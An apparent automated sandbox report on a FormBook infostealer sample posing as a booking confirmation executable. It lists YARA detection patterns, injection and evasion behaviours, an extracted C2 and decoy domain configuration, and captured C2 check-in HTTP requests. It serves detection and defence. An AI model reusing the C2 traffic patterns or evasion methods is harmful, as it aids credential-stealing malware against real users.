Loading ...

Play interactive tourEdit tour

Analysis Report Booking Confirmation.exe

Overview

General Information

Sample Name:Booking Confirmation.exe
Analysis ID:356529
MD5:78d9eadc9fcc580239b360ffa2c2220f
SHA1:2bc313ca573a9be005aa8d22e96601c10dcd5041
SHA256:e836c2aecd7a2ae83a5bb088780d9e7b8cd6c3a7ff6b9c3f1261bfd1f53dbef7
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Booking Confirmation.exe (PID: 7100 cmdline: 'C:\Users\user\Desktop\Booking Confirmation.exe' MD5: 78D9EADC9FCC580239B360FFA2C2220F)
    • Booking Confirmation.exe (PID: 3716 cmdline: C:\Users\user\Desktop\Booking Confirmation.exe MD5: 78D9EADC9FCC580239B360FFA2C2220F)
    • Booking Confirmation.exe (PID: 612 cmdline: C:\Users\user\Desktop\Booking Confirmation.exe MD5: 78D9EADC9FCC580239B360FFA2C2220F)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 5072 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 7024 cmdline: /c del 'C:\Users\user\Desktop\Booking Confirmation.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18409:$sqlite3step: 68 34 1C 7B E1
      • 0x1851c:$sqlite3step: 68 34 1C 7B E1
      • 0x18438:$sqlite3text: 68 38 2A 90 C5
      • 0x1855d:$sqlite3text: 68 38 2A 90 C5
      • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
      00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.Booking Confirmation.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.Booking Confirmation.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.Booking Confirmation.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18409:$sqlite3step: 68 34 1C 7B E1
          • 0x1851c:$sqlite3step: 68 34 1C 7B E1
          • 0x18438:$sqlite3text: 68 38 2A 90 C5
          • 0x1855d:$sqlite3text: 68 38 2A 90 C5
          • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
          0.2.Booking Confirmation.exe.36e45e0.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            0.2.Booking Confirmation.exe.36e45e0.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x13bbb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x13be32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x1689f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x168c72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x147955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x174795:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x147441:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x174281:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x147a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x174897:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x147bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x174a0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x13c84a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x16968a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1466bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x1734fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x13d543:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x16a383:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x14d5f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x17a437:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x14e5fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 8 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Booking Confirmation.exeReversingLabs: Detection: 33%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: Booking Confirmation.exeJoe Sandbox ML: detected
            Source: 5.2.Booking Confirmation.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: Booking Confirmation.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
            Source: Booking Confirmation.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: chkdsk.pdbGCTL source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: chkdsk.pdb source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Booking Confirmation.exe, 00000005.00000002.710355206.000000000195F000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Booking Confirmation.exe, chkdsk.exe
            Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 34.102.136.180:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.evolvekitchendesign.com/ffw/
            Source: global trafficHTTP traffic detected: GET /ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.buehne.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.praktijkinfinity.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ffw/?MZg8=vCSLLgJGCp79MzLYydBa+Bsk3bm2BxHz5ofTxOlO5FwRAAdXOpMXkN2jq+v+BBk+R2pe&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.localmoversuae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
            Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: global trafficHTTP traffic detected: GET /ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.buehne.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.praktijkinfinity.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ffw/?MZg8=vCSLLgJGCp79MzLYydBa+Bsk3bm2BxHz5ofTxOlO5FwRAAdXOpMXkN2jq+v+BBk+R2pe&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.localmoversuae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.buehne.cloud
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 08:38:10 GMTServer: Apache/2Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 0d 0a 38 62 0d 0a 2f 66 66 77 2f 3f 4d 5a 67 38 3d 51 74 71 54 77 32 47 79 59 78 66 32 57 79 52 46 74 70 6d 53 6d 4a 4a 76 68 6e 72 77 30 33 75 4e 52 4f 74 53 79 64 59 6e 4a 6b 33 4a 44 52 69 59 6b 36 62 73 76 58 57 67 74 75 66 35 74 6c 45 4a 63 4d 4e 2b 26 61 6d 70 3b 75 54 78 58 63 3d 6f 6a 4f 30 64 4a 4b 30 48 76 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 0d 0a 31 32 62 0d 0a 77 77 77 2e 70 72 61 6b 74 69 6a 6b 69 6e 66 69 6e 69 74 79 2e 6f 6e 6c 69 6e 65 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 90<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL 8b/ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&amp;uTxXc=ojO0dJK0Hv was not found on this server.<HR><I>12bwww.praktijkinfinity.online</I></BODY></HTML>0
            Source: Booking Confirmation.exe, 00000000.00000003.650111317.0000000005725000.00000004.00000001.sdmpString found in binary or memory: http://en.w
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000006.00000002.914045803.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Booking Confirmation.exe, 00000000.00000003.653249672.0000000005728000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000003.651977805.0000000005727000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000003.652187363.0000000005726000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnE
            Source: Booking Confirmation.exe, 00000000.00000003.651858652.000000000572E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnht
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.come
            Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coms
            Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comt
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: Booking Confirmation.exe, 00000000.00000003.651298106.000000000573B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comym
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
